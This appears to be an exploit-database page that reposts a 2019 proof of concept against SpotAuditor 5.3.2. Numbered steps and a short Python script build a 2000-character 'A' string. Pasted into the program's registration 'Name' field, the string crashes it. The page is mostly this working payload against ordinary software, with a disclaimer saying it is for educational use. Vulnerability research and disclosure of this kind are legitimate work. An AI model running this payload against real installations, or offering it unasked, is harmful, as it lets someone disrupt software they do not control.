Spotauditor 5.3.2 name denial of service Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2019-11-29 | Type : dos | Platform : windows
This exploit / vulnerability Spotauditor 5.3.2 name denial of service is for educational purposes only and if it is used you will do on your own risk!


[+] Code ...

#Exploit Title: SpotAuditor 5.3.2 - 'Name' Denial Of Service
#Exploit Author : ZwX
#Exploit Date: 2019-11-28
#Vendor Homepage : http://www.nsauditor.com/
#Link Software : http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe
#Tested on OS: Windows 7
#Social: twitter.com/ZwX2a
#contact: msk4@live.fr

'''
Proof of Concept (PoC):
=======================

1.Download and install SpotAuditor
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Name' and click on 'Ok'
6.SpotAuditor Crashed
'''
#!/usr/bin/python

http = "http//"
buffer = "\x41" * 2000


poc = http + buffer
file = open("poc.txt","w")
file.write(poc)
file.close()

print "POC Created by ZwX"